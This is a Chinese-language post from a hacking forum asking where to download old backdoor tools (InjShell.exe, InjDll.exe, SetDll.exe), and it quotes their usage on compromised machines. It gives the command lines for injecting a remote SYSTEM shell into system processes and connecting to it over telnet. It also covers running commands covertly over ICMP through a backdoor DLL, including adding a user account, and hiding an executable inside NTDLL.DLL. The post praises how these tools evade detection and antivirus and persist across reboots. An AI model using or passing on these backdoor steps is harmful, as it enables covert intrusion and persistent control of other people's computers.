|
 | 作者: ok0ok [ok0ok]
 论坛用户 |
登录 |
| 找了好久,都找不到可以下载的网站了,谢谢 1.在系统进程中插入SHELL 先上传InjShell.exe 到肉鸡 用法: 先查一下系统进程 用PSLIST.EXE PV.EXE 等查 一般有SMSS.EXE internat.exe svchost.exe conime.exe 等 InjShell.exe (进程.EXE) SHELLPORT 如 InjShell.exe internat.exe 1234 成功后 telnet ip 1234 就可以的到一个SYSTEM的CMD SHELL ! 非常不错的后门,由于是系统进程所以很难被发现,也不会被查杀 随系统启动。 ----------------- 2.在系统进程插入DLL 用法: InjDll.exe (系统进程.EXE ) ICMP.DLL(后门DLL) 然后用客户端 IcmpReplySend.exe IP CMD 如IcmpReplySend.exe 127.0.0.1 “net user czh /add" 这样我们随时可以远程运行命令(SYSTEM权限的)并且是采用ICMP通讯,不开PORT,安全,可靠,隐密! 刚完成测试,很不错 ,不过ICMP封包是名文的,用IRis抓到 ------------------------- 3.在DLL中插入EXE 用法:SetDll.exe <ExeName> <DllName> 如 SetDll.exe NCX99.EXE NTDLL.DLL (为系统进程必用DLL库文件) 然后telnet 127.0.0.1 99 这样NCX99.EXE就不出现在进程中。 |
| 地主 发表时间: 05-03-06 15:20 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 请问谁还有这几个老的后门工具,InjShell.exeInjDll.exeSetDll.exe